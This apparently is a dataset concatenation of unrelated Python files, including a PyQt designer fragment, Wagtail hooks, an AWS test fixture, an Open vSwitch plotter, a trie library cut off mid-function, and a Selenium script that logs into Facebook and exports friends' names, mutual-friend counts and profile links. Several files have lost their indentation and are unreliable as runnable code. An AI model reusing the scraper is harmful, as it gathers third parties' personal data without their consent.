                item = items.pop()  # pop one from the list and remove it from the scene, iterating until all are gone
self.scene.removeItem(item)
del item
self.addBorders()
stream = QDataStream(fh)
stream.setVersion(QDataStream.Qt_5_7)
magic = stream.readInt32()
if magic != MagicNumber:
raise IOError("not a valid .cmpd file")
fileVersion = stream.readInt16()
if fileVersion != FileVersion:
raise IOError("unrecognised .cmpd file version")
while not fh.atEnd():
self.readItemFromStream(stream)
except IOError as e:
QMessageBox.warning(self, "Page Designer -- Open Error",
"Failed to open {0}: {1}".format(self.filename, e))
finally:
if fh is not None:
fh.close()
global Dirty
Dirty = False
def save(self):
if not self.filename:
path = "."
fname,filetype = QFileDialog.getSaveFileName(self,
"Page Designer - Save As", path,
"cmPage Designer Files (*.cmpd *.pgd *.cmd)")
if not fname:
return
self.filename = fname
fh = None
try:
fh = QFile(self.filename)
if not fh.open(QIODevice.WriteOnly):
raise IOError(str(fh.errorString()))
self.scene.clearSelection()
stream = QDataStream(fh)
stream.setVersion(QDataStream.Qt_5_7)
stream.writeInt32(MagicNumber)
stream.writeInt16(FileVersion)
for item in self.scene.items():
self.writeItemToStream(stream, item)
except IOError as e:
QMessageBox.warning(self, "Page Designer -- Save Error",
"Failed to save {0}: {1}".format(self.filename, e))
finally:
if fh is not None:
fh.close()
global Dirty
Dirty = False
def readItemFromStream(self, stream, offset=0):
type = ""
position = QPointF()
matrix = QTransform()
rotateangle=0#add by yangrongdong
type=stream.readQString()
stream >> position >> matrix
if offset:
position += QPointF(offset, offset)
if type == "Text":
text = ""
font = QFont()
text=stream.readQString()
stream >> font
rotateangle=stream.readFloat()
tx=TextItem(text, position, self.scene, font, matrix)
tx.setRotation(rotateangle)
elif type == "Box":
rect = QRectF()
stream >> rect
style = Qt.PenStyle(stream.readInt16())
rotateangle=stream.readFloat()
bx=BoxItem(position, self.scene, style, rect, matrix)
bx.setRotation(rotateangle)
elif type == "Pixmap":
pixmap = QPixmap()
stream >> pixmap
rotateangle=stream.readFloat()
px=self.createPixmapItem(pixmap, position, matrix)
px.setRotation(rotateangle)
def writeItemToStream(self, stream, item):
if isinstance(item, TextItem):
stream.writeQString("Text")
stream<<item.pos()<< item.transform()
stream.writeQString(item.toPlainText())
stream<< item.font()
stream.writeFloat(item.rotation())#add by yangrongdong
elif isinstance(item, GraphicsPixmapItem):
stream.writeQString("Pixmap")
stream << item.pos() << item.transform() << item.pixmap()
stream.writeFloat(item.rotation())#add by yangrongdong
elif isinstance(item, BoxItem):
stream.writeQString("Box")
stream<< item.pos() << item.transform() << item.rect
stream.writeInt16(item.style)
stream.writeFloat(item.rotation())#add by yangrongdong
app = QApplication(sys.argv)
form = MainForm()
rect = QApplication.desktop().availableGeometry()
# QA.desktop(): Returns the desktop widget (also called the root window).
# .availableGeometry() QDesktopWidget::availableGeometry(const QWidget *widget) Return QRect
form.resize(int(rect.width() * 0.6), int(rect.height() * 0.9))
form.show()
app.exec_()
|
StarcoderdataPython
|
3241705
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Created on Wed May 18 07:51:28 2016
@author: ericgrimson
"""
import datetime
class Person(object):
def __init__(self, name):
"""create a person called name"""
self.name = name
self.birthday = None
self.lastName = name.split(' ')[-1]
def getLastName(self):
"""return self's last name"""
return self.lastName
def setBirthday(self,month,day,year):
"""sets self's birthday to birthDate"""
self.birthday = datetime.date(year,month,day)
def getAge(self):
"""returns self's current age in days"""
if self.birthday == None:
raise ValueError
return (datetime.date.today() - self.birthday).days
def __lt__(self, other):
"""return True if self's ame is lexicographically
less than other's name, and False otherwise"""
if self.lastName == other.lastName:
return self.name < other.name
return self.lastName < other.lastName
# other methods
def __str__(self):
"""return self's name"""
return self.name
# example usage
p1 = Person('<NAME>')
p1.setBirthday(5,14,84)
p2 = Person('<NAME>')
p2.setBirthday(3,4,83)
p3 = Person('<NAME>')
p3.setBirthday(10,28,55)
p4 = Person('<NAME>')
p5 = Person('<NAME>')
personList = [p1, p2, p3, p4]
for e in personList:
print(e)
personList.sort()
print()
for e in personList:
print(e)
|
StarcoderdataPython
|
6630866
|
def max_num_in_list(items):
tot = max(items)
return tot
print(max_num_in_list([1, 2, -8, 0]))
#
# def max_num_in_list(list):
# max = list[0]
# for a in list:
# if a > max:
# max = a
# return max
#
#
# print(max_num_in_list([1, 2, -8, 0]))
"""
Write a Python program to get the largest number from a list.
"""
|
StarcoderdataPython
|
4820366
|
<filename>wagtail_localize/test/wagtail_hooks.py
from wagtail.contrib.modeladmin.options import (
ModelAdmin,
ModelAdminGroup,
modeladmin_register,
)
from wagtail_localize.modeladmin.options import TranslatableModelAdmin
from .models import NonTranslatableModel, TestModel, TestPage
class TestPageAdmin(TranslatableModelAdmin):
model = TestPage
class TestModelAdmin(TranslatableModelAdmin):
model = TestModel
inspect_view_enabled = True
class NonTranslatableModelAdmin(ModelAdmin):
model = NonTranslatableModel
@modeladmin_register
class ModelAdminAdmin(ModelAdminGroup):
items = (TestPageAdmin, TestModelAdmin, NonTranslatableModelAdmin)
menu_label = "Model Admin"
|
StarcoderdataPython
|
1604806
|
<reponame>Tejas-Nanaware/Learning-OpenCV<filename>haar cascades/own haar cascade/get files.py
import urllib.request
import cv2
import numpy as np
import os
print("Hi")
def store_raw_images():
print("getting url")
# neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n00007846'
# neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n07942152'
neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n00523513'
print("Got URL")
neg_image_urls = urllib.request.urlopen(neg_images_link).read().decode()
pic_num = 1
print(pic_num)
if not os.path.exists('neg'):
os.makedirs('neg')
print("made dir")
for i in neg_image_urls.split('\n'):
try:
print(str(pic_num) + "\t" + i)
urllib.request.urlretrieve(i, "neg/"+str(pic_num)+".jpg")
img = cv2.imread("neg/"+str(pic_num)+".jpg",cv2.IMREAD_GRAYSCALE)
# should be larger than samples / pos pic (so we can place our image on it)
resized_image = cv2.resize(img, (500, 500))
cv2.imwrite("neg/"+str(pic_num)+".jpg",resized_image)
pic_num += 1
except Exception as e:
print(str(e))
store_raw_images()
|
StarcoderdataPython
|
382623
|
import os
import pytest
from pathlib import Path
import logging
from balsa import Balsa
from awsimple import __application_name__, __author__, is_mock, use_moto_mock_env_var, S3Access
from test_awsimple import test_awsimple_str, temp_dir, cache_dir
mock_env_var = os.environ.get(use_moto_mock_env_var)
if mock_env_var is None:
os.environ[use_moto_mock_env_var] = "1"
# if using non-local pytest, create the credentials and config files dynamically
aws_credentials_and_config_dir = Path(Path.home(), ".aws")
aws_credentials_file = Path(aws_credentials_and_config_dir, "credentials")
aws_config_file = Path(aws_credentials_and_config_dir, "config")
if is_mock():
if not aws_credentials_and_config_dir.exists():
aws_credentials_and_config_dir.mkdir(parents=True, exist_ok=True)
if not aws_credentials_file.exists():
credential_strings = [
"[default]\naws_access_key_id=AAAAAAAAAAAAAAAAAAAA\naws_secret_access_key=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
f"[{test_awsimple_str}]\naws_access_key_id=AAAAAAAAAAAAAAAAAAAA\naws_secret_access_key=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
]
aws_credentials_file.write_text("\n".join(credential_strings))
if not aws_config_file.exists():
config_strings = ["[profile default]\nregion=us-west-2", f"[profile {test_awsimple_str}]\nregion=us-west-2"]
aws_config_file.write_text("\n".join(config_strings))
class TestAWSimpleLoggingHandler(logging.Handler):
def emit(self, record):
print(record.getMessage())
assert False
@pytest.fixture(scope="session", autouse=True)
def session_fixture():
temp_dir.mkdir(parents=True, exist_ok=True)
cache_dir.mkdir(parents=True, exist_ok=True)
balsa = Balsa(__application_name__, __author__, log_directory=Path("log"), delete_existing_log_files=True, verbose=False)
# add handler that will throw an assert on ERROR or greater
test_handler = TestAWSimpleLoggingHandler()
test_handler.setLevel(logging.ERROR)
logging.getLogger().addHandler(test_handler)
balsa.init_logger()
print(f"{is_mock()=}")
@pytest.fixture(scope="module")
def s3_access():
_s3_access = S3Access(profile_name=test_awsimple_str, bucket_name=test_awsimple_str, cache_dir=cache_dir)
return _s3_access
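# A test module can then request the fixture by name, e.g. (the bucket_exists()
# call is an assumption about the S3Access API, shown for illustration only):
#
#   def test_bucket(s3_access):
#       assert s3_access.bucket_exists()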
|
StarcoderdataPython
|
1858617
|
import time
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.chrome.options import Options
from selenium.common import exceptions
from datetime import datetime
from bs4 import BeautifulSoup
import pandas as pd
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
usr=input('Enter Email Id:') #enter email
pwd=input('Enter Password:') #enter password
driver = webdriver.Chrome("C:\\Users\\shawn\\Desktop\\Programming\\Facebook\\chromedriver.exe") #change this path to appropriate chrome driver directory
driver.get("http://facebook.com")
username_box = driver.find_element_by_id('email')
username_box.send_keys(usr)
password_box = driver.find_element_by_id('pass')
password_box.send_keys(<PASSWORD>)
login_box = driver.find_element_by_id('loginbutton')
login_box.click()
def click_random_spot():
actions = ActionChains(driver)
actions.move_to_element_with_offset(driver.find_element_by_tag_name('body'), 0,0)
actions.move_by_offset(100, 200).click().perform()
def download_friends():
driver.get("https://m.facebook.com/me/friends")
time.sleep(5)
print('Scrolling to bottom...')
#Scroll to bottom
while driver.find_elements_by_css_selector('#m_more_friends'):
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(5)
def get_soup(driver):
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
return(soup)
download_friends()
soup = get_soup(driver)
mutual_friends = soup.findAll("div", { "class" : "notice ellipsis" })
friend_names = soup.findAll("div", { "class" : "_84l2" })
mutual_friend_dict = {}
url_dict = {}
#didnt use function here because wanted to return two separate dictionaries
for i in range(len(mutual_friends)):
try:
num_mutual_friends = int(mutual_friends[i].text[:-15])
except ValueError:
try:
num_mutual_friends = int(mutual_friends[i].text[:-14]) #singular when I only have "1 mutual friend"
except ValueError:
continue
friend_name = friend_names[i].find("a").text
if friend_name in mutual_friend_dict.keys():
dup_count = 0
while friend_name in mutual_friend_dict.keys(): #handles the duplicate error attaching an underscore and a label number to the name
dup_count+=1
if dup_count == 1: #first iteration so friend name does not have any extra stuff added onto it
friend_name = friend_name+"_"+str(dup_count)
else:
friend_name = friend_name[:-len(str(dup_count-1))-1]+"_"+str(dup_count) #concise way to label duplicates
mutual_friend_dict[friend_name] = num_mutual_friends
try:
friend_url = "http://facebook.com" +friend_names[i].find("a")["href"]
url_dict[friend_name] = friend_url
except KeyError: #these people dont have FB Urls and may have deleted their Facebooks
print(friend_name)
top_mutual_friends = sorted(mutual_friend_dict, key=mutual_friend_dict.get, reverse = True)
df_friends = pd.DataFrame(list(mutual_friend_dict.items()), columns=['Friend Name', 'Number of Mutual Friends'])
df_friends_decr = df_friends.sort_values(by =["Number of Mutual Friends"], ascending = False).reset_index(drop=True)
df_friends_decr["Ranking"] = df_friends_decr["Number of Mutual Friends"].rank(method = 'min', ascending = False)
df_friends_decr["Percentile"],df_friends_decr["Facebook Link"] = [None,None]
for index, row in df_friends_decr.iterrows(): #create percentile column
df_friends_decr.at[index,'Percentile'] = stats.percentileofscore(df_friends_decr["Number of Mutual Friends"],df_friends_decr["Number of Mutual Friends"][index])
try:
df_friends_decr.at[index,'Facebook Link'] = url_dict[df_friends_decr["Friend Name"][index]]
except KeyError: #people who deleted their FB
pass
df_friends_decr.to_csv("C:\\Users\\shawn\\Desktop\\Programming\\Facebook\\Facebook Friends, Mutual Friends, Link.csv", index = False) #change this
plt.figure()
plt.plot(df_friends_decr["Percentile"], df_friends_decr["Number of Mutual Friends"])
plt.title("Number of Facebook Friends vs Percentile")
plt.xlabel("Percentile")
plt.ylabel("Number of Facebook Friends")
plt.figure()
plt.hist(df_friends_decr["Number of Mutual Friends"], bins=30)
plt.title("Histogram for Number of Mutual Friends")
plt.xlabel("Number of Mutual Friends")
plt.ylabel("Frequency")
def find_friend_info(df, friend_name): #useful for finding specific friend info. If multiple people with the same name returns both
df_friend= df[df["Friend Name"].str.contains(friend_name)]
return df_friend
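# Example lookup (the name is hypothetical):
# print(find_friend_info(df_friends_decr, 'John'))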
|
StarcoderdataPython
|
170765
|
<gh_stars>0
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import matplotlib.pyplot as plt
import commands
import time
i=0
tempo=600
x=list()
y11tx=list()
y11rx=list()
y12tx=list()
y12rx=list()
y14tx=list()
y14rx=list()
plt.ion() #Turn interactive mode on
fig,(ax11,ax12,ax14)=plt.subplots(3,sharex=True,sharey=True)
fig.suptitle('Taxa de Pacotes - Switch 3',fontsize=18)
ax11.set_title('Interface eth11',fontsize=14)
ax12.set_title('Interface eth12',fontsize=14)
ax14.set_title('Interface eth14',fontsize=14)
plt.xlabel('Tempo(s)',fontsize=14)
ax11.set_ylabel('Tx. Pacotes',fontsize=14)
ax12.set_ylabel('Tx. Pacotes',fontsize=14)
ax14.set_ylabel('Tx. Pacotes',fontsize=14)
ax11.grid()
ax12.grid()
ax14.grid()
plt.axis([0,tempo,0,10000])
while i<tempo:
tx11=int(commands.getoutput("ovs-ofctl dump-ports s3 11 | grep tx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
rx11=int(commands.getoutput("ovs-ofctl dump-ports s3 11 | grep rx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
tx12=int(commands.getoutput("ovs-ofctl dump-ports s3 12 | grep tx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
rx12=int(commands.getoutput("ovs-ofctl dump-ports s3 12 | grep rx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
tx14=int(commands.getoutput("ovs-ofctl dump-ports s3 14 | grep tx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
rx14=int(commands.getoutput("ovs-ofctl dump-ports s3 14 | grep rx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
x.append(i)
y11tx.append(tx11)
y11rx.append(rx11)
y12tx.append(tx12)
y12rx.append(rx12)
y14tx.append(tx14)
y14rx.append(rx14)
#ax11.scatter(i,tx11,c='r')
#ax11.scatter(i,rx11,c='g')
#ax12.scatter(i,tx12,c='r')
#ax12.scatter(i,rx12,c='g')
#ax14.scatter(i,tx14,c='r')
#ax14.scatter(i,rx14,c='g')
ax11.plot(x,y11tx,'r-',label='TX')
ax11.plot(x,y11rx,'g-',label='RX')
ax12.plot(x,y12tx,'r-',label='TX')
ax12.plot(x,y12rx,'g-',label='RX')
ax14.plot(x,y14tx,'r-',label='TX')
ax14.plot(x,y14rx,'g-',label='RX')
if i==0:
ax11.legend(loc='upper left',fontsize=12)
ax12.legend(loc='upper left',fontsize=12)
ax14.legend(loc='upper left',fontsize=12)
plt.show()
plt.pause(0.0001) #If there is an active figure it will be updated and displayed, and the GUI event loop will run during the pause
i+=1
time.sleep(1)
|
StarcoderdataPython
|
12607
|
'''
Part of the dibase.rpi.gpio.test package.
GPIO pin id support classes' platform tests.
Underlying GPIO pin ids are those used by the Linux gpiolib and used
to identify a device's GPIO pins in the Linux sys filesystem GPIO
sub-tree.
Developed by <NAME> / Dibase Limited.
Copyright (c) 2012 Dibase Limited
License: dual: GPL or BSD.
'''
import unittest
import sys
if __name__ == '__main__':
# Add path to directory containing the dibase package directory
sys.path.insert(0, './../../../..')
from dibase.rpi.gpio import pinid
class PinIdRPiPlatforrmTestCases(unittest.TestCase):
def test_0000_get_rpi_major_revision_index_returns_zero_or_positive_int(self):
returned_rev_index = pinid.PinId._get_rpi_major_revision_index()
self.assertIsNotNone(returned_rev_index)
self.assertIsInstance(returned_rev_index,int)
self.assertTrue(returned_rev_index>=0)
def test_0020_PinId_value_of_p1_sda_0_or_2(self):
rev_index = pinid.PinId._get_rpi_major_revision_index()
p1_sda_gpio_id = pinid.PinId.p1_sda()
self.assertTrue((rev_index==0 and p1_sda_gpio_id==0) or p1_sda_gpio_id==2)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
4986191
|
#!/usr/bin/env python3
import string
class Solution:
    def uniqueLetterString(self, s):
        # d1[c]: index of the latest occurrence of c; d2[c]: the occurrence before that
        d1, d2 = {c: -1 for c in string.ascii_uppercase}, {c: -1 for c in string.ascii_uppercase}
        ret, last = 0, 0
        for i, c in enumerate(s):
            # 'last' is the total count of unique letters over all substrings ending
            # at i: moving to i adds (i - d1[c]) substrings where c becomes unique and
            # removes (d1[c] - d2[c]) where it stops being unique, which simplifies
            # to last += i - 2*d1[c] + d2[c], written out below
            last = last + (i-1) + d2[c] - 2*d1[c] + 1
            print(f'i = {i}, c = {c}, last = {last}')  # debug trace
            ret += last
            d1[c], d2[c] = i, d1[c]
        return ret
sol = Solution()
s = 'LEETCODE'
s = 'ABA'
s = 'ABC'
print(sol.uniqueLetterString(s))
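# Expected output: 'ABC' has substrings A, B, C, AB, BC, ABC with unique-letter
# counts 1+1+1+2+2+3 = 10, so the call above prints 10 (after the debug trace).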
|
StarcoderdataPython
|
6692097
|
<reponame>pmacosta/putil<filename>putil/tree.py
# -*- coding: utf-8 -*-
# tree.py
# Copyright (c) 2013-2016 <NAME>
# See LICENSE for details
# pylint: disable=C0111,R0913,W0105,W0212
# Standard library imports
import copy
import sys
# Putil imports
import putil.exh
###
# Exception tracing initialization code
###
"""
[[[cog
import os, sys
if sys.hexversion < 0x03000000:
import __builtin__
else:
import builtins as __builtin__
sys.path.append(os.environ['TRACER_DIR'])
import trace_ex_tree
exobj_tree = trace_ex_tree.trace_module(no_print=True)
]]]
[[[end]]]
"""
###
# Functions
###
_F = lambda x, y: dict(field=x, value=y)
###
# Classes
###
class Tree(object):
r"""
Provides basic `trie <http://wikipedia.org/wiki/Trie>`_ (radix tree)
functionality
:param node_separator: Single character used to separate nodes in the tree
:type node_separator: string
:rtype: :py:class:`putil.tree.Tree` object
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.__init__
:raises: RuntimeError (Argument \`node_separator\` is not valid)
.. [[[end]]]
"""
# pylint: disable=E0602,R0902,R0903
def __init__(self, node_separator='.'):
self._db = {}
self._root = None
self._root_hierarchy_length = None
ufunc = unichr if sys.hexversion < 0x03000000 else chr
# Characters from http://www.unicode.org/charts/PDF/U2500.pdf
self._vertical = ufunc(0x2502)
self._vertical_and_right = ufunc(0x251C)
self._up_and_right = ufunc(0x2514)
putil.exh.addai(
'node_separator',
(not isinstance(node_separator, str)) or
(isinstance(node_separator, str) and len(node_separator) != 1)
)
self._node_separator = node_separator
def __bool__(self): # pragma: no cover
"""
Returns :code:`False` if tree object has no nodes, :code:`True`
otherwise. For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree()
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: False
>>> tobj.add_nodes([{'name':'root.branch1', 'data':5}])
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: True
"""
return bool(self._db)
def __copy__(self, memodict=None):
memodict = {} if memodict is None else memodict
cobj = Tree(self.node_separator)
cobj._db = copy.deepcopy(self._db, memodict)
cobj._root = self._root
cobj._root_hierarchy_length = self._root_hierarchy_length
return cobj
def __nonzero__(self): # pragma: no cover
"""
Returns :code:`False` if tree object has no nodes, :code:`True`
otherwise. For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree()
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: False
>>> tobj.add_nodes([{'name':'root.branch1', 'data':5}])
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: True
"""
return bool(self._db)
def __str__(self):
"""
Returns a string with the tree 'pretty printed' as a
character-based structure. Only node names are shown,
nodes with data are marked with an asterisk (:code:`*`).
For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree()
>>> tobj.add_nodes([
... {'name':'root.branch1', 'data':5},
... {'name':'root.branch2', 'data':[]},
... {'name':'root.branch1.leaf1', 'data':[]},
... {'name':'root.branch1.leaf2', 'data':'Hello world!'}
... ])
>>> print(tobj)
root
├branch1 (*)
│├leaf1
│└leaf2 (*)
└branch2
:rtype: Unicode string
"""
ret = ''
if self._db:
ret = self._prt(
name=self.root_name, lparent=-1, sep='', pre1='', pre2=''
)
return ret.encode('utf-8') if sys.hexversion < 0x03000000 else ret
def _collapse_subtree(self, name, recursive=True):
""" Collapse a sub-tree """
oname = name
children = self._db[name]['children']
data = self._db[name]['data']
del_list = []
while (len(children) == 1) and (not data):
del_list.append(name)
name = children[0]
children = self._db[name]['children']
data = self._db[name]['data']
parent = self._db[oname]['parent']
self._db[name]['parent'] = parent
if parent:
self._db[parent]['children'].remove(oname)
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[name]
)
else:
self._root = name
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
for node in del_list:
self._del_node(node)
if recursive:
for name in copy.copy(children):
self._collapse_subtree(name)
def _create_intermediate_nodes(self, name):
""" Create intermediate nodes if hierarchy does not exist """
hierarchy = self._split_node_name(name, self.root_name)
node_tree = [
self.root_name+
self._node_separator+
self._node_separator.join(hierarchy[:num+1])
for num in range(len(hierarchy))
]
iobj = [
(child[:child.rfind(self._node_separator)], child)
for child in node_tree if child not in self._db
]
for parent, child in iobj:
self._db[child] = {
'parent':parent, 'children':[], 'data':[]
}
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[child]
)
def _create_node(self, name, parent, children, data):
""" Create new tree node """
self._db[name] = {'parent':parent, 'children':children, 'data':data}
def _delete_prefix(self, name):
lname = len(name)+1
self._root = self._root[lname:]
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
for key, value in list(self._db.items()):
value['parent'] = (
value['parent'][lname:]
if value['parent'] else
value['parent']
)
value['children'] = [child[lname:] for child in value['children']]
del self._db[key]
self._db[key[lname:]] = value
def _delete_subtree(self, nodes):
"""
Delete subtree private method (no argument validation and usage of
getter/setter private methods for speed)
"""
nodes = nodes if isinstance(nodes, list) else [nodes]
iobj = [
(self._db[node]['parent'], node)
for node in nodes
if self._node_name_in_tree(node)
]
for parent, node in iobj:
# Delete link to parent (if not root node)
del_list = self._get_subtree(node)
if parent:
self._db[parent]['children'].remove(node)
# Delete children (sub-tree)
for child in del_list:
del self._db[child]
if self._empty_tree():
self._root = None
self._root_hierarchy_length = None
def _del_node(self, name):
""" Delete tree node """
del self._db[name]
def _empty_tree(self):
""" Returns True if the tree has no nodes/data """
return not self._db
def _find_common_prefix(self, node1, node2):
""" Find common prefix between two nodes """
tokens1 = [item.strip() for item in node1.split(self.node_separator)]
tokens2 = [item.strip() for item in node2.split(self.node_separator)]
ret = []
for token1, token2 in zip(tokens1, tokens2):
if token1 == token2:
ret.append(token1)
else:
break
return self.node_separator.join(ret)
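# Example (hedged illustration): with the default '.' separator,
#   _find_common_prefix('root.a.b', 'root.a.c') returns 'root.a'
#   _find_common_prefix('root.a', 'other.a') returns '' (no shared prefix)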
def _get_children(self, name):
return self._db[name]['children']
def _get_data(self, name):
return self._db[name]['data']
def _get_nodes(self):
return None if not self._db else sorted(self._db.keys())
def _get_node_separator(self):
return self._node_separator
def _get_root_name(self):
return self._root
def _get_root_node(self):
return None if not self.root_name else self._db[self.root_name]
def _get_subtree(self, name):
return [name]+[
node for child in self._db[name]['children']
for node in self._get_subtree(child)
]
def _get_parent(self, name):
return self._db[name]['parent']
def _node_in_tree(self, name):
putil.exh.addex(
RuntimeError,
'Node *[name]* not in tree',
name not in self._db,
_F('name', name)
)
return True
def _node_name_in_tree(self, name):
putil.exh.addex(
RuntimeError,
'Node *[node_name]* not in tree',
name not in self._db,
_F('node_name', name)
)
return True
def _prt(self, name, lparent, sep, pre1, pre2):
"""
Print a row (leaf) of tree
:param name: Full node name
:type name: string
:param lparent: Position in full node name of last separator before
node to be printed
:type lparent: integer
:param pre1: Connector next to node name, either a null character if
the node to print is the root node, a right angle if node
name to be printed is a leaf or a rotated "T" if the node
name to be printed is one of many children
:type pre1: string
"""
# pylint: disable=R0914
nname = name[lparent+1:]
children = self._db[name]['children']
ncmu = len(children)-1
plst1 = ncmu*[self._vertical_and_right]+[self._up_and_right]
plst2 = ncmu*[self._vertical]+[' ']
slist = (ncmu+1)*[sep+pre2]
dmark = ' (*)' if self._db[name]['data'] else ''
return '\n'.join(
[
u'{sep}{connector}{name}{dmark}'.format(
sep=sep, connector=pre1, name=nname, dmark=dmark
)
]+
[
self._prt(child, len(name), sep=schar, pre1=p1, pre2=p2)
for child, p1, p2, schar in zip(children, plst1, plst2, slist)
]
)
def _rename_node(self, name, new_name):
"""
Rename node private method (no argument validation and usage of
getter/setter private methods for speed)
"""
# Update parent
if not self.is_root(name):
parent = self._db[name]['parent']
self._db[parent]['children'].remove(name)
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[new_name]
)
# Update children
iobj = (
self._get_subtree(name)
if name != self.root_name else
self.nodes
)
for key in iobj:
new_key = key.replace(name, new_name, 1)
new_parent = (
self._db[key]['parent']
if key == name else
self._db[key]['parent'].replace(name, new_name, 1)
)
self._db[new_key] = {
'parent':new_parent,
'children':[
child.replace(name, new_name, 1)
for child in self._db[key]['children']
],
'data':copy.deepcopy(self._db[key]['data'])
}
del self._db[key]
if name == self.root_name:
self._root = new_name
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
def _search_tree(self, name):
""" Search the tree for nodes that contain a specific hierarchy name """
tpl1 = '{sep}{name}{sep}'.format(sep=self._node_separator, name=name)
tpl2 = '{sep}{name}'.format(sep=self._node_separator, name=name)
tpl3 = '{name}{sep}'.format(sep=self._node_separator, name=name)
return sorted(
[
node
for node in self._db
if (tpl1 in node) or node.endswith(tpl2) or
node.startswith(tpl3) or (name == node)
]
)
def _set_children(self, name, children):
self._db[name]['children'] = sorted(list(set(children)))
def _set_data(self, name, data):
self._db[name]['data'] = data
def _set_root_name(self, name):
self._root = name
def _set_parent(self, name, parent):
self._db[name]['parent'] = parent
def _split_node_name(self, name, root_name=None):
return [
element.strip()
for element in name.strip().split(self._node_separator)
][0 if not root_name else self._root_hierarchy_length:]
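# Example (hedged illustration): for a tree rooted at 'root'
# (root hierarchy length 1),
#   _split_node_name('root.branch1.leaf1', 'root') returns ['branch1', 'leaf1']
#   _split_node_name('root.branch1.leaf1') returns ['root', 'branch1', 'leaf1']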
def _validate_node_name(self, var_value):
""" NodeName pseudo-type validation """
# pylint: disable=R0201
var_values = var_value if isinstance(var_value, list) else [var_value]
for var_value in var_values:
if ((not isinstance(var_value, str)) or
(isinstance(var_value, str) and
((' ' in var_value) or
any(
[
element.strip() == ''
for element in
var_value.strip().split(self._node_separator)
]
)))):
return True
return False
def _validate_nodes_with_data(self, names):
""" NodeWithData pseudo-type validation """
node_ex = putil.exh.addai('nodes')
names = names if isinstance(names, list) else [names]
node_ex(not names)
for ndict in names:
node_ex(
(not isinstance(ndict, dict)) or
(isinstance(ndict, dict) and
(set(ndict.keys()) != set(['name', 'data'])))
)
name = ndict['name']
node_ex(
(not isinstance(name, str)) or
(
isinstance(name, str) and (
(' ' in name) or
any(
[
element.strip() == ''
for element in
name.strip().split(self._node_separator)
]
)
)
)
)
def add_nodes(self, nodes):
r"""
Adds nodes to tree
:param nodes: Node(s) to add with associated data. If there are
several list items in the argument with the same node
name the resulting node data is a list with items
corresponding to the data of each entry in the argument
with the same node name, in their order of appearance,
in addition to any existing node data if the node is
already present in the tree
:type nodes: :ref:`NodesWithData`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.add_nodes
:raises:
* RuntimeError (Argument \`nodes\` is not valid)
* ValueError (Illegal node name: *[node_name]*)
.. [[[end]]]
For example:
.. =[=cog
.. import docs.support.incfile
.. docs.support.incfile.incfile('tree_example.py', cog.out)
.. =]=
.. code-block:: python
# tree_example.py
import putil.tree
def create_tree():
tobj = putil.tree.Tree()
tobj.add_nodes([
{'name':'root.branch1', 'data':5},
{'name':'root.branch1', 'data':7},
{'name':'root.branch2', 'data':[]},
{'name':'root.branch1.leaf1', 'data':[]},
{'name':'root.branch1.leaf1.subleaf1', 'data':333},
{'name':'root.branch1.leaf2', 'data':'Hello world!'},
{'name':'root.branch1.leaf2.subleaf2', 'data':[]},
])
return tobj
.. =[=end=]=
.. code-block:: python
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.get_data('root.branch1')
[5, 7]
"""
self._validate_nodes_with_data(nodes)
inn_ex = putil.exh.addex(
ValueError, 'Illegal node name: *[node_name]*'
)
nodes = nodes if isinstance(nodes, list) else [nodes]
# Create root node (if needed)
if not self.root_name:
self._set_root_name(
nodes[0]['name'].split(self._node_separator)[0].strip()
)
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
self._create_node(
name=self.root_name,
parent='',
children=[],
data=[]
)
# Process new data
for node_dict in nodes:
name, data = node_dict['name'], node_dict['data']
if name not in self._db:
# Validate node name (root of new node same as tree root)
inn_ex(
not name.startswith(self.root_name+self._node_separator),
_F('node_name', name)
)
self._create_intermediate_nodes(name)
self._db[name]['data'] += copy.deepcopy(
data
